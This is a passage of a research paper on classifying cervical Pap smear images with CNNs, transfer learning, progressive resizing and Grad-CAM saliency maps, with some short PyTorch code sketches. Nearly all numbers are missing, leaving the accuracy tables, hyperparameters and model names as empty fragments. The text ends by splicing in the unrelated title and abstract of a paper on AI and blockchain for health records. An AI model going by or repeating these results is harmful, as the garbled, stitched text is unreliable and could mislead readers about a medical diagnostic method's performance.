we propose a methodology to subdue the existing binary classification scores and propose a multi-class classification for single-cell and whole slide images of cervical cancer datasets, following the bethesda system. the proposed approach of superimposing progressive resizing with transfer learning on cnns yields promising multi-class classification scores with improved visual inferences. deep learning models are known to have limited interpretability, and this is a challenging and active area of research (simonyan, vedaldi & zisserman, ). to enhance interpretability, we implemented a complementary interpretation with an intuitive saliency map (gradcam) visualisation. gradcam aids in apprehending the features learned by our model to ensure a high level of transparency in visual interpretation (zhang, nian wu & zhu, ). we carried out experiments on two different datasets obtained from different institutes/universities. to summarize, our contributions are as follows:
1. to the best of our knowledge, the proposed work is the first implementation to present a singular multi-class classification methodology for neoplastic and pre-neoplastic lesion detection in whole slide images.
2. our experiments achieved state-of-the-art performance scores for binary and multi-class classification on the herlev and sipakmed datasets.
3. the cnn implementation with progressive resizing and transfer learning techniques yields significant improvements and generates benchmark scores for multi-class classification of whole slide images of the sipakmed dataset, which helps in carrying out metamorphic analysis even for overlapping cell lesions.
4. the article also brings out a comparative study of the results produced by various classifiers and advanced cnn models (trained using transfer learning and progressive resizing techniques) on the herlev and sipakmed datasets.
5. gradcam-based feature interpretation extends enhanced assimilation of the generated results, highlighting the pre-malignant and malignant lesions by visual localization in the images.

datasets
we carried out experiments on the herlev and sipakmed (plissiti et al., ) databases separately. the herlev database was created at herlev university hospital, denmark, using a digital camera and microscope, and contains images of single cells. skilled cyto-technicians and doctors have annotated each cell into one of seven classes (i.e., superficial squamous epithelia, intermediate squamous epithelia, columnar epithelial, mild squamous non-keratinizing dysplasia, moderate squamous non-keratinizing dysplasia, severe squamous non-keratinizing dysplasia, and squamous cell carcinoma). the morphological features (i.e., cell shape, nucleus size, nucleus-to-cytoplasm ratio, nucleus opacity, nucleus dyeing intensity, cytoplasm opacity, and cytoplasm dyeing intensity) help differentiate the cells. the sipakmed database consists of , annotated images that have been manually cropped from cluster cell images by expert cytopathologists into five categories: normal cells of two types (superficial-intermediate, parabasal), abnormal cells of two types (koilocytotic and dyskeratotic), and benign (metaplastic) cells. the dataset distributions for the herlev and sipakmed datasets are shown in figs. and , respectively. specimen pap smear images of the herlev and sipakmed datasets are shown in figs. and .

proposed methodology
our work first carries out binary classification experiments on the herlev and sipakmed datasets using k-nearest neighbour, stochastic gradient descent, support vector machine, and random forest classifiers. then, convolution neural network models, that is, vgg- (simonyan & zisserman, ), resnet- (szegedy et al., ), and efficientnet-b (tan & le, ), were employed to carry out binary classification, where the cnns showed considerable improvements in the results compared to the other classifiers. we carried out due customization of the final layers of the cnn models for multi-class classification on the herlev and sipakmed datasets. we used pre-trained weights from the imagenet dataset (referred to as transfer learning (pan & yang, )) with superimposition of progressive resizing while re-training the cnn models on the cervical cancer datasets. finally, the multi-class classification experiments highlight enhanced results for both datasets. saliency maps for whole slide images improve assimilation along with the classification scores. figure illustrates the proposed methodology used to generate classification results with a saliency map, employing convolution neural networks with transfer learning and progressive resizing techniques.
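the text does not spell out how the gradcam saliency maps are computed; a minimal sketch of the standard grad-cam procedure on a stand-in torchvision model is given below. the backbone (resnet-18), the target layer, and the input size are illustrative assumptions, not the exact networks evaluated in this work.

```python
# minimal grad-cam sketch on a stand-in torchvision model; the layer,
# model, and input shape are illustrative assumptions, not the paper's setup.
import torch
import torch.nn.functional as F
from torchvision.models import resnet18


def grad_cam(model, x, target_class, conv_layer):
    acts, grads = {}, {}

    def fwd_hook(_m, _inp, out):
        acts["value"] = out.detach()           # feature maps of the target layer

    def bwd_hook(_m, _gin, gout):
        grads["value"] = gout[0].detach()      # gradient of the score w.r.t. those maps

    h1 = conv_layer.register_forward_hook(fwd_hook)
    h2 = conv_layer.register_full_backward_hook(bwd_hook)
    try:
        model.zero_grad()
        scores = model(x)                      # shape (1, num_classes)
        scores[0, target_class].backward()
        weights = grads["value"].mean(dim=(2, 3), keepdim=True)   # gap of the gradients
        cam = F.relu((weights * acts["value"]).sum(dim=1))        # weighted sum, then relu
        cam = cam / (cam.max() + 1e-8)         # normalise to [0, 1]
    finally:
        h1.remove()
        h2.remove()
    return cam


if __name__ == "__main__":
    model = resnet18().eval()
    x = torch.randn(1, 3, 224, 224)            # dummy pap smear tile
    heatmap = grad_cam(model, x, target_class=0, conv_layer=model.layer4[-1])
    print(heatmap.shape)                       # torch.Size([1, 7, 7]); upsample to overlay
```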
figure . the herlev cervical cancer dataset distribution, categorized into seven classes.
figure . the sipakmed cervical cancer dataset distribution, categorized into five classes; the distribution of full cell images is shown at (a) and of whole slide images at (b).
figure . single-cell images from the herlev dataset, categorized into seven classes and shown as (a) superficial squamous epithelia, (b) intermediate squamous epithelia, (c) columnar epithelial, (d) mild squamous non-keratinizing dysplasia, (e) moderate squamous non-keratinizing dysplasia, (f) severe squamous non-keratinizing dysplasia, (g) squamous cell carcinoma in situ.
figure . single-cell images from the sipakmed dataset, categorized into five classes: (a) superficial-intermediate cells, (b) parabasal cells, (c) metaplastic cells, (d) dyskeratotic cells, and (e) koilocytotic cells.
figure . the methodology and inference pipeline used to analyze the pap smear (whole slide) images using convnets (trained using transfer learning and progressive resizing techniques) to generate predictions and an activation map.

the implementation consists of four stages: ( ) data preprocessing, ( ) model implementation, ( ) training strategy, and ( ) testing.

data preprocessing
since data augmentation acts as a regularizer and helps reduce overfitting while training a machine learning model, we used data augmentation techniques to artificially expand the size of the training dataset. we created modified versions of the dataset's images and obtained skillful models with an improved ability to generalize and classify the images by training the deep learning models on more data variations. we implemented transformation techniques to generate cell image variations, as the cells are invariant to rotations. we carried out these transformations with θ = − to degrees, α = . – . , pa = . , and pb = . , employing the following techniques:
1. horizontal flipping of the images with probability pb;
2. rotations of the images, owing to their rotational invariance;
3. random scaling by α with probability pa.
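a minimal sketch of this augmentation pipeline, assuming torchvision transforms, is given below. the probability, rotation range, scaling range, and image size are placeholders, since the exact numeric settings are not legible in this copy of the text and the transform names are not taken from the paper.

```python
# sketch of the augmentation pipeline described under "data preprocessing".
# p_flip, degrees, and scale_range are placeholders for pb, θ, and α.
from torchvision import transforms

p_flip = 0.5               # pb: probability of a horizontal flip (placeholder)
degrees = 15               # θ range in degrees (placeholder)
scale_range = (0.9, 1.1)   # α: random rescaling factor (placeholder)

train_transforms = transforms.Compose([
    transforms.RandomHorizontalFlip(p=p_flip),
    transforms.RandomRotation(degrees=degrees),
    transforms.RandomAffine(degrees=0, scale=scale_range),
    transforms.Resize((224, 224)),
    transforms.ToTensor(),
])

# applied lazily to each pil image when a dataset / dataloader reads it, e.g.:
# dataset = torchvision.datasets.ImageFolder("sipakmed/train", transform=train_transforms)
```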
model implementation
the herlev and sipakmed datasets incorporate single-cell images, while the whole slide images (wsi) of the sipakmed dataset expose varied intensity (average intensity, average contrast), texture (smoothness, uniformity, third moment, entropy), and shape features (area, major and minor axis length, eccentricity, orientation, equivalent diameter, solidity, and extent). the proposed cnn implementation focuses on effective extraction of cell morphology features, that is, cell cytoplasm, cell shape, nucleus type, hyperchromicity, dyeing exposure of cells, and cell edges. we experimented with the vgg- , resnet- , resnet- , efficientnet-b , efficientnet-b , and efficientnet-b models. as efficientnets (image classification models) scale more efficiently than other cnns by deliberately balancing the network's depth, width, and resolution, we carried out experiments on efficientnet models to enhance performance, customizing the output layers to suitably perform binary and multi-class classification (tan & le, ). the values of the hyperparameters were optimized while carrying out the experiments. to implement transfer learning, we used pre-trained weights obtained after training the model on a large dataset (i.e., imagenet) while re-training the cnns on the herlev and sipakmed datasets. we applied the progressive resizing technique by running the iterations repetitively to extract the optimum weights with precise feature extraction. these optimum weights were carried forward to the subsequent iteration of the experiments, where we progressively resized the images and re-ran the experiments; the outcomes of the iterations were analyzed continuously to achieve the best classification scores.

training strategy
among the family of efficientnet models, we used the efficientnet-b , b , and b cnn models with pre-trained weights obtained from the imagenet large scale visual recognition challenge dataset with , classes. the models were customized at the final classification layer to classify the cells into the desired output classes: while training the models for the herlev and sipakmed datasets, the final classification layers were customized to classify seven and five classes, respectively. the training and test data were split in a : ratio. transfer learning and progressive resizing techniques were employed while re-training the cnn models to leverage the features of the imagenet pre-trained model. we used categorical cross-entropy as the loss function. the learning rates were optimized using the -cycle policy, which helped achieve super-convergence with faster training while ensuring optimum regularization (smith & topin, ). we used weight decay wd and discriminative learning rates, since different layers capture different types of information; this allows us to preserve the filters in the layers closer to the input, learned by efficientnet on the imagenet dataset. the network was trained with the adamw optimizer (loshchilov & hutter, ). the learning rates were scheduled using a -cycle policy, which enables super-convergence, allowing faster training of neural networks with substantial learning rates and regularization, preventing overfitting (yosinski et al., ; smith, ). the learning rates were determined using the lr finder (howard & gugger, ); the learning rate was re-optimized after each epoch to identify the optimal learning rate for the subsequent epoch. figure illustrates the employment of the learning rate finder before the first and third training iterations of the resnet- model on the herlev dataset.
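the training recipe described above (imagenet weights, a customized final layer, discriminative learning rates, adamw with weight decay, and a 1-cycle schedule) can be sketched in plain pytorch as follows. the backbone (resnet-34), learning rates, epoch count, and steps per epoch are illustrative assumptions; the lr finder step used in the paper is omitted here.

```python
# sketch of the training strategy described above; values are placeholders.
import torch
import torch.nn as nn
from torchvision.models import resnet34, ResNet34_Weights

num_classes = 7                                              # herlev: 7, sipakmed: 5
model = resnet34(weights=ResNet34_Weights.IMAGENET1K_V1)     # transfer learning
model.fc = nn.Linear(model.fc.in_features, num_classes)      # customized head

# discriminative learning rates: small lr for the pretrained backbone,
# larger lr for the freshly initialised classification head.
backbone_params = [p for n, p in model.named_parameters() if not n.startswith("fc")]
head_params = list(model.fc.parameters())
optimizer = torch.optim.AdamW(
    [{"params": backbone_params, "lr": 1e-4},
     {"params": head_params, "lr": 1e-3}],
    weight_decay=1e-2,                                       # weight decay wd
)

epochs, steps_per_epoch = 10, 100                            # placeholders
scheduler = torch.optim.lr_scheduler.OneCycleLR(
    optimizer, max_lr=[1e-4, 1e-3],
    epochs=epochs, steps_per_epoch=steps_per_epoch,          # 1-cycle policy
)
criterion = nn.CrossEntropyLoss()                            # categorical cross-entropy

# inside the training loop, per batch:
#   loss = criterion(model(images), labels)
#   loss.backward(); optimizer.step(); scheduler.step(); optimizer.zero_grad()
```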
We used discriminative learning rates to preserve the lower-level features and regulate the higher-level features for optimum results. The VGG- model was trained on both datasets to carry out binary and multi-class classification as part of the first ConvNet implementation. In VGG- , the convolution layers that analyze the input image features are referred to as the "backbone," and the remaining, culminating linear layers are referred to as the "head." The head converts the analyzed features into predictions for the two classes in our binary classification. To train the model with differential learning rates, we split the head from the rest of the architecture and replaced it with an AdaptiveConcatPool layer, a flatten layer, and blocks of batch normalization, dropout, linear, and ReLU layers, respectively. The AdaptiveConcatPool layer helps preserve the backbone's feature representations more effectively than using only a max-pool or average-pool layer. We also appended a fully connected layer of and units with softmax activation as the final classification layer for the Herlev and SIPaKMeD datasets, respectively. We carried out suitable customization of all the ConvNets for the respective datasets, which attained improved performance scores.
Figure: Loss function graphs while training the ResNet- CNN model on the Herlev dataset; the learning rate graphs generated with the LR finder after the first iteration (consisting of epoch) and the third iteration (consisting of epochs) are shown at (a) and (b), respectively.
Hyperparameters, the properties that govern the entire training process and determine the network structure, were carefully optimized. The learning rate was re-optimized after each epoch to identify the optimal rate for the subsequent epoch. We determined the number of epochs and the activation functions from numerous experimental results and used suitably optimized values while carrying out the experiments. EfficientNets, as image classification models, scale more efficiently by deliberately balancing the network's depth, width, and resolution, and the models have therefore demonstrated enhanced performance. We customized their output layers suitably for binary and multi-class classification (Tan & Le) on both datasets. We carried out experiments on EfficientNet-B , B , B , B , B , and B . Although the higher EfficientNet variants, that is, B –B , have larger width, depth, or resolution, the accuracy gain saturated compared to the B model, which demonstrates the limitation of single-dimension scaling. Hence, experiments were carried out on EfficientNet-B , EfficientNet-B , and EfficientNet-B , and we used the baseline EfficientNet-B model for binary and multi-class classification on our cervical cancer datasets. For WSI image analysis, we used the progressive resizing technique (Howard & Gugger) on these convolutional neural network models. We first trained the model with images sized × to obtain the weights. Using these weights, we then trained the model on resized WSI images and iterated the training repeatedly while gradually increasing the image size to × , × , and × , unfreezing the saved weights (from the previous iteration) every time, as each larger-scale model incorporates the previous smaller-scale model's layers and weights. We observed significant results by following this strategy.
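The short sketch below illustrates the progressive resizing loop in the form described above. The image sizes and epoch counts are placeholders, and make_loader and train_one_epoch are hypothetical helpers standing in for data loading and the training step shown earlier; the only point of the sketch is that the same model, and therefore its weights, is carried from one resolution stage to the next.

def make_loader(image_size):
    """Hypothetical helper: rebuild the training DataLoader with images
    resized to (image_size x image_size)."""
    raise NotImplementedError

def train_one_epoch(model, loader):
    """Hypothetical helper: one pass of the training loop sketched earlier."""
    raise NotImplementedError

def train_progressively(model, sizes=(128, 256, 512), epochs_per_stage=5):
    # Train at the smallest size first, then keep training the *same* model
    # at each larger size, so every stage starts from the weights learned
    # at the previous (smaller) resolution.
    for size in sizes:
        loader = make_loader(image_size=size)
        for _ in range(epochs_per_stage):
            train_one_epoch(model, loader)
    return model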
A figure shows the implementation methodology of progressive resizing on the whole slide images, in which the weights obtained from one training model are applied to the next model at a scaled-up image size.

Testing
During testing, we resized the input image to (h × w) and gave the resized images as input to the networks to predict the output class. For all the tasks on the SIPaKMeD dataset, we used -fold and -fold cross-validation with the data split released along with the dataset.

Results and discussion
Evaluation parameters
As accuracy in isolation does not prove a model's efficacy, we evaluated the models with several performance metrics. The performance of each model is ascertained from its accuracy (Acc), precision, sensitivity (Sens), specificity (Spec), h-mean, F1-score (or F-beta), and kappa score, followed by an independent manual analysis by the pathologists. Sensitivity, or recall, measures the proportion of actual abnormal cells that are correctly predicted as belonging to the same class. Specificity measures the proportion of actual negatives that are correctly identified as such. Accuracy is the overall percentage of cells correctly assigned to their respective classes. The F1-score is a classifier metric that combines precision and recall:

Accuracy = (TP + TN) / (TP + TN + FP + FN)
Precision = TP / (TP + FP)
Recall = TP / (TP + FN)
F1 = (2 × Precision × Recall) / (Precision + Recall) = 2TP / (2TP + FP + FN)

Figure: The implementation methodology for the progressive resizing technique with transfer learning using the EfficientNet CNN model. Pre-trained weights obtained by training the model on large datasets are taken as the initializing weights of model (a) (i.e., an imaging input size of × pixels initially); the obtained weights are then carried forward to subsequent models (b) and (c) (i.e., imaging input sizes of × pixels and × pixels, respectively) to extract optimum features and progressively enhance efficiency.

We used Cohen's kappa score (Cohen), a statistical measure of "intra-rater reliability" that is more robust than a simple percent-agreement calculation. It measures agreement between two observers; in the unweighted form, disagreements are counted without taking the distance between categories into account, whereas the weighted form weights disagreements by that distance. The weighted kappa statistic κw is defined for two observers; there is no weighted kappa statistic for more than two observers. The following notation is used:
- n, the number of cases/observations.
- the number of raters/observers.
- k, the number of categories in which a case can be rated.
Cohen's weighted kappa κw is derived from the ordinary kappa by including a weight function w; if w is chosen as the identity matrix I_k, then Cohen's κw is identical to Cohen's κ. A linear weight is commonly chosen, calculated as

w_ij = 1 - |i - j| / (k - 1).

Alternatively, a quadratic weight could be used: w_ij = 1 - (i - j)^2 / (k - 1)^2. Then

p_o(w) = (1/n) Σ_{i=1..k} Σ_{j=1..k} w_ij f_ij,
p_e(w) = (1/n^2) Σ_{i=1..k} Σ_{j=1..k} w_ij r_i c_j,

with r_i and c_j again the row and column sums. The weighted kappa statistic is then given by

κ_w = (p_o(w) - p_e(w)) / (1 - p_e(w)).
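The metrics and the weighted kappa defined above can be computed with scikit-learn's public API; the minimal sketch below uses placeholder label arrays purely to illustrate the calls, not the study's data or code.

from sklearn.metrics import (accuracy_score, precision_score, recall_score,
                             f1_score, cohen_kappa_score)

y_true = [0, 1, 2, 2, 1]   # placeholder ground-truth class labels
y_pred = [0, 1, 2, 1, 1]   # placeholder predicted class labels

accuracy = accuracy_score(y_true, y_pred)
precision = precision_score(y_true, y_pred, average="macro")
recall = recall_score(y_true, y_pred, average="macro")
f1 = f1_score(y_true, y_pred, average="macro")
kappa_linear = cohen_kappa_score(y_true, y_pred, weights="linear")        # w_ij = 1 - |i-j|/(k-1)
kappa_quadratic = cohen_kappa_score(y_true, y_pred, weights="quadratic")  # w_ij = 1 - (i-j)^2/(k-1)^2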
Quantitative results
The results obtained for binary classification using the k-nearest neighbour, stochastic gradient descent, support vector machine, and random forest classifiers and the ResNet- and EfficientNet-B models on the Herlev and SIPaKMeD datasets are presented in this section. For the Herlev dataset, the ResNet- and EfficientNet-B models produced benchmark binary classification scores with . % accuracy, . % precision, . % recall, . % specificity, and . % F1-score, and . % accuracy, . % precision, . % recall, . % specificity, and . % F-beta score, respectively. A table illustrates the quantitative comparison of the binary classification results (Herlev dataset) obtained with the k-nearest neighbour, stochastic gradient descent, support vector machine, and random forest classifiers and the ResNet- and EfficientNet-B models; the results on the SIPaKMeD dataset are also shown in the table. A figure shows the binary classification of an abnormal single-cell image using ResNet- (trained on the Herlev dataset) and ResNet- (trained on the SIPaKMeD dataset) CNNs. Another figure shows the confusion matrices generated using k-nearest neighbour, support vector machine, stochastic gradient descent, and random forest for binary classification on the Herlev dataset. A further table illustrates the quantitative comparison of the multi-class classification results (Herlev dataset) obtained by experimenting with the VGG- , ResNet- , ResNet- , EfficientNet-B , EfficientNet-B , EfficientNet-B , and EfficientNet-B models. Multi-class classification scores on the SIPaKMeD dataset obtained by implementing VGG- , ResNet- , ResNet- , and EfficientNet-B (baseline) using transfer learning, vis-à-vis EfficientNet-B using transfer learning and the progressive resizing technique, are also shown in that table. The ResNet- (baseline) and EfficientNet-B ( × ) with progressive image resizing attained the highest scores.
Figure: The binary classification predictions generated using ResNet- (trained on the Herlev dataset) and ResNet- (trained on the SIPaKMeD dataset) for a single-cell image. The ResNet- and ResNet- CNNs generated predictions of . % and . % for an abnormal single-cell image input (shown at (a)); the Grad-CAM visualization and CNN feature interpretation obtained using ResNet- are shown at (b) and (c), and those obtained using ResNet- at (d) and (e), respectively.
Figure: The confusion matrices for binary classification predictions on the Herlev dataset: (a) support vector machine, (b) stochastic gradient descent, (c) k-nearest neighbour, and (d) random forest.
Table: The binary classification prediction scores for the Herlev and SIPaKMeD cervical cancer datasets under the evaluation criteria accuracy, precision, recall, F1-score, and kappa score. The table lists the scores for the k-nearest neighbour, support vector machine, stochastic gradient descent, and random forest classifiers and the ResNet- (baseline) and EfficientNet-B (baseline) CNN models.
Model | Accuracy (%) | Precision (%) | Recall (%) | F1-score (%) | K-score (%)
Herlev dataset
k-nearest neighbour | . | . | . | . | –
Support vector machine | . | . | . | . | –
Stochastic gradient descent | . | . | . | . | –
Random forest | . | . | . | . | –
SIPaKMeD dataset
ResNet- | . | . | . | . | .
EfficientNet-B | . | . | . | . | .

Table: The multi-class prediction scores for the Herlev and SIPaKMeD cervical cancer datasets under the evaluation criteria accuracy, precision, recall, F-beta, and kappa score. The multi-class classification convolutional neural networks used k-fold cross-validation, which showed a substantial increase in scores. EfficientNet-B , combined with transfer learning and progressive resizing, generated benchmark scores for the whole-slide images of the SIPaKMeD dataset.

Model | k-fold CV | Accuracy (%) | Precision (%) | Recall (%) | F-beta (%) | Kappa score (%)
Herlev
VGG- | -fold | . ± . | . ± . | . ± . | . ± . | . ± .
ResNet- | -fold | . ± . | . ± . | . ± . | . ± . | . ± .
ResNet- | -fold | . ± . | . ± . | . ± . | . ± . | . ± .
EfficientNet-B | -fold | . ± . | . ± . | . ± . | . ± . | . ± .
EfficientNet-B | -fold | . ± . | . ± . | . ± . | . ± . | . ± .
EfficientNet-B | -fold | . ± . | . ± . | . ± . | . ± . | . ± .
SIPaKMeD
VGG- | -fold | . ± . | . ± . | . ± . | . ± . | . ± .
ResNet- | -fold | . ± . | . ± . | . ± . | . ± . | . ± .
ResNet- | -fold | . ± . | . ± . | . ± . | . ± . | . ± .
EfficientNet-B | -fold | . ± . | . ± . | . ± . | . ± . | . ± .
EfficientNet-B | -fold | . ± . | . ± . | . ± . | . ± . | . ± .
EfficientNet-B | -fold | . ± . | . ± . | . ± . | . ± . | . ± .
EfficientNet-B | -fold | . ± . | . ± . | . ± . | . ± . | . ± .

Implementations with the proposed technique have attained perfect scores in sensitivity and specificity and the best kappa scores. The F1-scores of these models indicate their robustness in multi-class classification. The EfficientNet-B models were evaluated against all possibilities of overfitting. The multi-class classification results demonstrated improved feature extraction and computational efficiency with progressive resizing. A figure shows the confusion matrices of the multi-class classification generated using the EfficientNet-B CNN on the SIPaKMeD dataset. We carried out the experiments on EfficientNet-B with pre-trained weights, training progressively on × , × , × , and × images. The -fold cross-validation indicates that the model did not overfit.

Results validation
We used the annotated Herlev and SIPaKMeD datasets; in addition, the data were analyzed and reviewed by an expert pathologist at a secondary care hospital. An extensive set of whole slide images was shown to the experts for manual analysis and inspection to become acquainted with the dataset. We carried out validation tests to ascertain the results generated by the system; the validation was carried out by a manual kappa-score tally. × whole slide images that were not part of the training/testing datasets were segregated for the validation test. Independent pathologists and the trained model were given the × WSI images one by one for analysis, and the system's prediction scores were tallied against the expert analysis. Out of × WSI images, × WSI results matched; the expert could not interpret one WSI image due to low image quality. Observer bias was ruled out for each diagnosis, under the same microscopic setup and view, by bringing in two more pathologists to review and authenticate the diagnoses made by the system.
Figure: The confusion matrices at (a) and the generalized score at (b) for the multi-class classification results (SIPaKMeD dataset) obtained with the EfficientNet-B model. The benchmark classification score highlights the optimum results achieved by employing transfer learning in combination with progressive resizing.

Saliency maps
We generated Grad-CAM heat-maps using the final layer of a convolutional neural network. To corroborate the results generated by the system and to support manual validation, saliency maps, that is, gradient-weighted class activation maps (Grad-CAM), were implemented (Selvaraju et al.). In adaptive average pooling, we took the average of all the × × channels and converted them to a tensor of , followed by multiplying the tensor by a matrix of size ( × number of classes) to get the final output. While validating the multi-class experiments for whole slide pap smear images, we took five classes. The values represent the features extracted by the convolution layers, which are matrices; we took the first cell's average across every channel to show the activated areas when the model predicted a specific class. To generate the heatmaps, we used "hooks." A figure shows the Grad-CAM output for various class inputs, highlighting the feature extraction and predictions for abnormal and benign WSI classes.
Figure: The model-generated gradient-weighted class activation maps for the input pap smear images. The input pap smears and the generated maps show results for (a) abnormal 'koilocytotic,' (b) benign 'metaplastic,' and (c) abnormal 'dyskeratotic' classes.

Conclusions
In this research, we proposed a binary and multi-class classification pipeline for identifying carcinoma in pap smear images to carry out a metamorphic diagnosis of neoplastic and pre-neoplastic lesions. We are inspired by the emerging role of CNNs in aiding medical imaging-based diagnostics, where they can act as a digital second opinion to improve palliative care. The proposed pipeline starts with a cervical cell recognition stage. To begin with, we carried out experiments with binary classifiers and obtained performance scores. Towards further enhancement, we improved the performance of the ResNet- , ResNet- , and EfficientNet-B models with transfer learning. The ResNet- and EfficientNet-B models trained with the transfer learning technique showed a significant increase in performance, achieving . % accuracy, . % precision, . % recall, . % specificity, and . % F1-score, and . % accuracy, . % precision, . % recall, . % specificity, and . % F-beta score on the SIPaKMeD dataset, respectively. In a later stage, we carried out multi-class classification experiments on both datasets. We addressed a problem that has not been addressed effectively in the literature, that is, whole slide image analysis with multi-class classification. We proposed a novel approach of implementing progressive resizing and transfer learning on deep neural network models, which attained state-of-the-art computational efficiency and the best scores for accurate classification. The EfficientNet-B convolutional neural network model trained using transfer learning and progressive resizing showed promising multi-class classification results.
we achieved benchmark scores on wsi by effectively analyzing multi-layer cervical cells with, that is, . % accuracy, . % precision, . % recall, . % specificity, and . % f-beta score. we outperformed other techniques cited in recent literature, consistently in both types of classification problems. we ascertained the system generated predictions by a validation test where an expert’s manual analysis was tallied with prediction. we also showed the model’s transparency by visualizing the features learned by saliency maps, which enabled us to visualize the cnn generated predictions. acknowledgements we want to dedicate the work for humanity and the people working unflinchingly towards exploring remedies to cure cervical cancer infections. we also thank dr. ragini thapa, a graded pathologist, for valuable medical inputs and extending help in manual validation of the pap smear image samples. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � anant r. bhatt conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � amit ganatra conceived and designed the experiments, prepared figures and/or tables, and approved the final draft. � ketan kotecha analyzed the data, authored or reviewed drafts of the paper, validation of results, and approved the final draft. bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: source code is available in the supplemental files. data are available at the herlev cervical cancer database (http://mde-lab.aegean.gr/ index.php/downloads; specifically part ii: "new pap-smear database (images)") and the sipakmed cervical cancer database (https://www.cs.uoi.gr/~marina/sipakmed.html; data from all cell categories were used). supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references cohen j. . a coefficient of agreement for nominal scales. educational and psychological measurement ( ): – doi . / . cohen j. . weighted kappa: nominal scale agreement with provision for scaled disagreement or partial credit. psychological bulletin ( ): – doi . /h . cortes c, vapnik v. . support vector machine. machine learning ( ): – . howard j, gugger s. . fastai: a layered api for deep learning. information: an international interdisciplinary journal ( ): . isa nm. . automated edge detection technique for pap smear images using moving k-means clustering and modified seed based region growing algorithm. international journal of the computer, the internet and management ( ): – . loshchilov i, hutter f. . fixing weight decay regularization in adam. available at https://arxiv.org/abs/ . . pan sj, yang q. . a survey on transfer learning. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . papanicolaou gn, traut hf. . the diagnostic value of vaginal smears in carcinoma of the uterus. american journal of obstetrics and gynecology ( ): – doi . /s - ( ) - . plissiti me, dimitrakopoulos p, sfikas g, nikou c, krikoni o, charchanti a. . 
sipakmed: a new dataset for feature and image based classification of normal and pathological cervical cells in pap smear images. in: th ieee international conference on image processing (icip). piscataway: ieee, – . plissiti me, nikou c, charchanti a. . automated detection of cell nuclei in pap smear images using morphological reconstruction and clustering. ieee transactions on information technology in biomedicine ( ): – doi . /titb. . . saslow d, solomon d, lawson hw, killackey m, kulasingam sl, cain j, garcia far, moriarty at, waxman ag, wilbur dc, wentzensen n, downs ls jr, spitzer m, moscicki a-b, franco el, stoler mh, schiffman m, castle pe, myers er. . american cancer society, american society for colposcopy and cervical pathology, and american society for clinical pathology screening guidelines for the prevention and early detection of cervical cancer. american journal of clinical pathology ( ): – doi . /ajcptgd evrsjcg. selvaraju rr, cogswell m, das a, vedantam r, parikh d, batra d. . grad-cam: visual explanations from deep networks via gradient-based localization. in: proceedings of the ieee international conference on computer vision. – . bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://mde-lab.aegean.gr/index.php/downloads http://mde-lab.aegean.gr/index.php/downloads https://www.cs.uoi.gr/~marina/sipakmed.html http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / http://dx.doi.org/ . /h https://arxiv.org/abs/ . http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /titb. . http://dx.doi.org/ . /ajcptgd evrsjcg http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ simonyan k, vedaldi a, zisserman a. . deep inside convolutional networks: visualising image classification models and saliency maps. available at https://arxiv.org/abs/ . . simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. available at https://arxiv.org/abs/ . . smith ln. . a disciplined approach to neural network hyper-parameters: part -learning rate, batch size, momentum, and weight decay. available at https://arxiv.org/abs/ . . smith ln, topin n. . super-convergence: very fast training of neural networks using large learning rates. in: artificial intelligence and machine learning for multi-domain operations applications, volume . international society for optics and photonics, . solomon d, davey d, kurman r, moriarty a, o’connor d, prey m, raab s, sherman m, wilbur d, wright t jr, young n. . the bethesda system: terminology for reporting results of cervical cytology. jama ( ): – . szegedy c, ioffe s, vanhoucke v, alemi a. . inception-v , inception-resnet and the impact of residual connections on learning. available at https://arxiv.org/abs/ . . tan m, le qv. . efficientnet: rethinking model scaling for convolutional neural networks. available at https://arxiv.org/abs/ . . world health organization. a. comprehensive cervical cancer control: a guide to essential practice . geneva: world health organization. world health organization. b. latest global cancer data: cancer burden rises to . million new cases and . million cancer deaths in . geneva: world health organization. yosinski j, clune j, bengio y, lipson h. . how transferable are features in deep neural networks? in: advances in neural information processing systems, – . zhang l, lu l, nogues i, summers rm, liu s, yao j. 
. deeppap: deep convolutional networks for cervical cell classification. ieee journal of biomedical and health informatics ( ): – doi . /jbhi. . .
zhang q, nian wu y, zhu s-c. . interpretable convolutional neural networks. in: proceedings of the ieee conference on computer vision and pattern recognition. – .
Artificial intelligence and multi agent based distributed ledger system for better privacy and security of electronic healthcare records
Fahad F. Alruwaili
Computer Science, College of Computing and Information Technology, Shaqra University, Shaqra, Kingdom of Saudi Arabia

Abstract
Background: The application of artificial intelligence (AI) and the use of agent-based systems in healthcare have attracted various researchers aiming to improve the efficiency and utility of electronic health records (EHR). One of the most important recent developments is the integration of AI with blockchain, that is, distributed ledger technology (DLT), to enable better and decentralized governance. Privacy and security are critical to EHR implementation and adoption. Health records are updated every time a patient visits a doctor, as they contain important information about the health and wellbeing of the patient and describe the history of care received in the past and to date. Such records are therefore critical to research, hospitals, emergency rooms, healthcare laboratories, and even health insurance providers.
Methods: In this article, a platform employing AI and multi-agent based systems along with DLT technology for privacy preservation is proposed. The emphasis on security and privacy is highlighted during the process of collecting, managing, and distributing EHR data.
Results: This article aims to ensure that the privacy, integrity, and security metrics of electronic health records are met when such copies are not only immutable but also distributed. The findings of this work will help guide the development of further techniques that combine AI and multi-agent based systems backed by DLT technology for secure and effective handling of EHR data. The proposed architecture uses various AI-based intelligent agents and blockchain to provide privacy and security in EHR. A future enhancement of this work can be the addition of biometric based systems for improved security.

Subjects: Adaptive and Self-organizing Systems, Agents and Multi-agent Systems, Artificial Intelligence
Keywords: artificial intelligence, agents and multi-agent systems, adaptive & self-organizing systems, electronic health records, distributed ledger systems

